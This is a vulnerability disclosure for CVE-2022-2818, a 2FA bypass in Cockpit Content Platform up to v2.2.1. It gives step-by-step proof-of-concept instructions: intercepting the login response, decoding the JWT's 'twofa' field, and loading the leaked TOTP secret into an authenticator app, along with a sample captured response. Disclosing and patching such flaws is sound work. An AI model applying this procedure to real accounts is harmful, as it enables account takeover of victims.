Headline
CVE-2022-2818: 2FA Bypass in Cockpit Content Platform ≤ v2.2.1 in cockpit
Authentication Bypass by Primary Weakness in GitHub repository cockpit-hq/cockpit prior to 2.2.2.
Description
The 2FA (TOTP) secret is disclosed in the JWT returned after a user logs into their account in Cockpit Content Platform ≤ v2.2.1. Anyone who obtains that token (in the PoC below, an attacker who already knows the victim's username and password) can decode the secret and generate valid 2FA codes, bypassing the second factor entirely.
Proof of Concept
1. Log in with your admin account, enable 2FA for that account, and log out.
2. Go to http://yourserver.com/cockpit221/auth/login, enter your username and password, and intercept the request in Burp Suite or OWASP ZAP.
3. In the intercept tab, right-click the request, choose "Do intercept > Response to this request", and forward the request.
4. You will receive a response like the following from http://yourserver.com/cockpit221/auth/check, returned in reply to the username/password submission. Note the `twofa` field:
HTTP/1.0 200 OK
Date: Thu, 11 Aug 2022 11:24:32 GMT
Server: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/8.1.6 mod_perl/2.0.12 Perl/v5.34.1
X-Powered-By: PHP/8.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 520
Connection: close
Content-Type: application/json
{"success":true,"user":{"name":"Suvam","user":"suvam","email":"[email protected]","twofa":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoic3V2YW0iLCJlbWFpbCI6ImFkbWluQHN1dmFtLmNvbSIsImFjdGl2ZSI6dHJ1ZSwibmFtZSI6IlN1dmFtIiwiaTE4biI6ImVuIiwicm9sZSI6ImFkbWluIiwidGhlbWUiOiJhdXRvIiwiX21vZGlmaWVkIjoxNjYwMjE2OTczLCJfY3JlYXRlZCI6MTY2MDIxNDU5OSwiX2lkIjoiN2QwM2FhZWI2MjM1NjVkZGM3MDAwMzRlIiwidHdvZmEiOnsiZW5hYmxlZCI6dHJ1ZSwic2VjcmV0IjoiMjdPWUNJSVpJQ1JER0JUVUFPVUVTQzNHM1BXNUU2Q04ifX0.Q5DL1pZv4bYI8909luvRZse4FnszLFOGIVCvGVcqbDk"}}
5. Copy the JWT from the `twofa` field and decode it. A JWT has the form header.payload.signature; the payload is only base64url-encoded, not encrypted, so it can be read without the server's signing key.
6. Decode the payload. The decoded claims contain a `twofa` object with `"enabled":true` and the authenticator `secret` (the base32 TOTP seed) in clear text.
7. Copy that secret into Google Authenticator (or any TOTP app). The app now produces valid codes for the victim's account, and 2FA is bypassed.
8. An attacker who knows or has phished a victim's password can therefore exploit this vulnerability to bypass 2FA and take over the account.
Proof Of Concept Video : https://drive.google.com/file/d/1rKCtY5W7XyIuApHtVAdWOusHJpw8b8OF/view?usp=sharing
Impact
Account Takeover
Related news
Cockpit Content Platform through version 2.2.1 is vulnerable to a two-factor authentication (2FA) bypass. The 2FA secret is disclosed in a JWT token after a user logs into their account, allowing an attacker who holds that token to generate valid 2FA codes and bypass the second factor. A patch is available on the `develop` branch and is expected to be part of version 2.2.2.